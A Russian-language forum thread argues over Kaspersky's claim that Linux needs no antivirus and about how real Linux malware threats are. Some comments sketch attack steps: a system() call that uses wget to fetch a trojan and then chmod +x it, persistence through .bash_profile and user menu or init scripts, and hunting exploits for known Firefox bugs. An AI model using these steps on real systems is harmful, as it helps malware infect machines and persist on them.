Евгений Касперский: линукс нужен только для хранения исходных кодов ядра

ОЧЕНЬ ТОЛСТО!!!!!!!!! И это от Касперского? Жесть.

Веб верверов тоже 1%? И маков в США 1%?

> Ну а что получается, когда процент линукс-решений велик? Вот что: http://www.linux.org.ru/news/security/3583539

Ичо?

Уязвимы Linux-устройства на базе mipsel, с открытым web-интерфейсом, telnetd или sshd в DMZ, со слабыми паролями.

Слабый пароль - он везде слабый пароль.

и чем это навредит обычному трояну, которому нужно заблокировать экран и написать «отправь смс»? любое приложение из-под юзера так может сделать. и для нуба это будет тож самое, что и под виндой

>А что можно украсть на Линкус-компьютере?

не, это комплимент. все ценное круто защищено: права доступа, селинукс, шифрованные разделы. не то что дырявая винда

Дело в том, что его (исходник) запускать из шелла никто и не будет. К примеру, поместят сам код уже в выделенную под фокс память (которая не была отдана системе) и вуаля! Все уже запущено ;)

>любое приложение из-под юзера так может сделать.

эх, зачем в xorg по-дефолту убрали Ctrl-Alt-Backspace...

КСПЕРСКИЙ: Почему чуть больше чем для Linux, но, все-таки, гораздо меньше чем для Windows, вирусов для MacOS? По той же самой причине – что, все-таки, в основном, пользователи MacOS – это продвинутые пользователи. А, во-вторых, MacOS распространен где? В Штатах.

А.ПЛЮЩЕВ: Ну, в Штатах там их пользуют непродвинутые пользователи. Там картина как раз наоборот.

Е.КАСПЕРСКИЙ: Отвечаю на вопрос. В Штатах, Западная Европа, Австралия. А где находится подавляющее большинство киберпреступников? Китай, Латинская Америка и русскоговорящие страны.

Ловко выкрутился, оказывает география решает в борьбе с вирусами под мак... Интервью на Эхо Москвы.(с)

>и чем это навредит обычному трояну, которому нужно заблокировать экран и написать «отправь смс»? любое приложение из-под юзера так может сделать. и для нуба это будет тож самое, что и под виндой

Давай так, я ставлю очень дырявый фаерфокс, ставлю дефолтную бубунту, ты мне кидаешь ссылку на сайт с блокером, если я заражаюсь, то оплачиваю твое потерянное время. Ты как X бит обойдешь? Объясни мне пожалуйста.

Так известно же зачем нужны трёхъядерные Phenom. На одном ядре работает кошмарский, на другом w7, на третьем уже пользовательские приложения :))

А по сабжу — почти согласен (кроме помощи жителям России ;) )

Самое ценное — хранится именно в хомяке. Ибо все остальное из / можно за пол-часа восстановить-переустановить. А данные...

>Дело в том, что его (исходник) запускать из шелла никто и не будет. К примеру, поместят сам код уже в выделенную под фокс память (которая не была отдана системе) и вуаля! Все уже запущено ;)

Ссылку на уязвимость.

можно украсть /dev/random /dev/urandom и самое страшное - /dev/null

> и чем это навредит обычному трояну

Запуститься не позволит.

любое приложение из-под юзера так может сделать

Ну так проблема в юзерах.

эммм, выполню chmod?

>Ну так проблема в юзерах.

ну про это речь и идет

фаерфоксом?

если, конечно, админ, а не Одмин там настраивает ОС.

>Ссылку на уязвимость.

Ну, как бы за вас никто гуглить не будет. Ссылку я уже кидал. Вот еще раз.

http://www.mozilla.org/security/known-vulnerabilities/firefox36.html

Здесь по лисе 3.6. Советую пошерстить по критичным (красным) ошибкам. Далее на багтрекерах можно скорее всего найти и эксплоит. Так что, если вам таки интересно — то вперед ;)

п.с. да, и не забыть поставить лисицу, которая подвержена таким уязвимостям (до патча).

п.п.с. Да, и вы думаете — люди зря используют NoScript? Он не только для блокировки флеша нужен.

>Веб верверов тоже 1%?

На веб-серверах никто не хранит конфиденциальные данные, в здравом уме. И набор софта/железо на них порой совсем куцое, поэтому профита как раз на 1%

Утютютю, а магазины?

- Причина малой актуальности антивирусных решений для Линукс-систем заключается в природе современного вирусописательства. 99.9% новых вирусов создаются компьютерными преступниками в корыстных интересах (украсть, обмануть, спам разослать с компьютера-жертвы). А что можно украсть на Линкус-компьютере? Исходные коды ядра? Ага…

Совершенно верно. IMHO нужно быть редкостным профаном, чтобы не понимать сего элементарного факта.

>Ещё на нескольких сайтах копии нашлись :) Хотя конечно обидно, что погрохали

Вот первоисточник: http://echo.msk.ru/programs/tochka/663605-echo/

давай предположим, что в фаерфоксе появляется 0day уязвимость, выполнить произвольный код на атакуемой машине с правами текущего пользователя. в домашнем каталоге пользователя в этом случае я волен делать все что захочу

вот именно.
мое мнение, что единственный оберегающий от вирусов фактор в никсах - это их сложность для начинающих, и необходимость включения извилин. облегчая хомячкам жизнь в никсах - мы делаем еще один шаг к вирусам, троянам и тотальному опопсению хорошей операционки.

А как?

Как раз вебсервера - это основные цели киберпреступников. Украсть можно начиная от паролей на сайт заканчивая номерами кредиток. Но я еще ни разу не слышал чтобы веб-сервер взломали не через стороннее ПО, а используя «дырки» линукса.

Ну и как ты бинарник запустишь? Или твоя мегапрограмма будет работать до закрытия фокса?

>тотальному опопсению хорошей операционки

Дело в том, что это уже происходит. Линукс уже (как и ЛОР) не тот торт, что был еще, скажем, в 2004

>У меня дырка в ФФ, как мне из него запустить бинарник без Х бита?

Зависит от дырки - если позволяет запустить произвольный код с правами текущего пользователя, то какие могут быть проблемы? Код УЖЕ запущен. Да даже если потребуется - системными вызовами же и создаешь бинарник, и ставишь бит, и скажем меняешь в меню пути до приложений, или для консольщиков, меняешь какой нибудь .bash_profile.

>вот именно.
мое мнение, что единственный оберегающий от вирусов фактор в никсах - это их сложность для начинающих, и необходимость включения извилин. облегчая хомячкам жизнь в никсах - мы делаем еще один шаг к вирусам, троянам и тотальному опопсению хорошей операционки.

Наконец-то вменяемый комментарий, в убунте пока +Х по дефолту не сделали.

уже происходит, и благодаря именно шаттлворту и прочим мандривам.
поэтому благими намерениями - сами знаете куда дорога вымощена.

> А что можно украсть на Линкус-компьютере? Исходные коды ядра? Ага…
У меня недавно увели пароль от модераторского аккаунта на одном сайте банальным javascript'ом. Хорошо, что я вовремя связался с админом сайта, и мы решили это раньше, чем злоумышленники что-то сделали. Так что не надо тут.

Кстати да, .bash_profile еще та дыра.

>Утютютю, а магазины?

А что, у тебя MySQL с самописным движком на php крутится на выделенном сервере с мощным процессором/OЗУ и ты вдобавок ведешь там всю бухгалтерию? Очень сомневаюсь.

> уже происходит, и благодаря именно шаттлворту и прочим мандривам. поэтому благими намерениями - сами знаете куда дорога вымощена.

Я думаю если использовать только оф репозитарии и не выполнять сомнительный скачанный код, вероятность заболеть стремится в минус.

Ты реально боишься что придут толпы вирусов? Тогда Евгений Касперский идет тебе на помощь)

мое мнение, что единственный оберегающий от вирусов фактор в никсах - это их сложность для начинающих, и необходимость включения извилин. облегчая хомячкам жизнь в никсах - мы делаем еще один шаг к вирусам, троянам и тотальному опопсению хорошей операционки.

Единственный оберегающий от вирусов фактор в никсах - это их чрезвычайно низкая распространенность в среде конечных пользователей. Сложность же для начинающих - это всего лишь одна из причин, по которой линуксой пользуются столь мало.

Да он упоротый

блджад

system(«wget url_до_трояна»);
system(«chmod +x файл_трояна»);

> Ты реально боишься что придут толпы вирусов?

мне бояться нечего, за сообщество обидно.

ман Ctrl+Alt+F1 и ман htop.

>Как раз вебсервера - это основные цели киберпреступников.

ботнеты из веб-серверов? не встречал упоминания чего-то...

Украсть можно начиная от паролей на сайт

который никому не нужен

заканчивая номерами кредиток.

которых там нет

Но я еще ни разу не слышал чтобы веб-сервер взломали не через стороннее ПО, а используя «дырки» линукса.

линукс лишь ядро, gnu linux - ядро линукс + сторонее (gnu) ПО

а еще можно через fuse подключать образ файловой системы с удаленной машины, тогда и зависимости в шелл-коде таскать не надо и прав рута не нужно

Core i7 920 пойдет?

>Кстати да, .bash_profile еще та дыра.

А еще инит скрипты DE/WM раземещенные в ~, а еще система меню, а еще ярлыки, а еще алиасы, а еще ... Вобщем очень много чего - я не вирмейкер, но и то нашел бы способ автозагрузится при старте или через несколько минут после.

Ты дурак? FF не умеет запускать через уязвимости С код. Продолжай дальше.

А что, на более слабом процессоре линукс тормозит или как? :-)

>ботнеты из веб-серверов?

roundcube

www.roundcube.ru

да при чем тут раундкуб? мало чтоли дырок во всяких джумлах, друпалах и вордпрессах?

самый хит - трояны, распространяющиеся через вконтакты с одноклассниками и выпасающие фтп-пароли к хостингам. а дальше - спам, iframe с порнухой и т.д.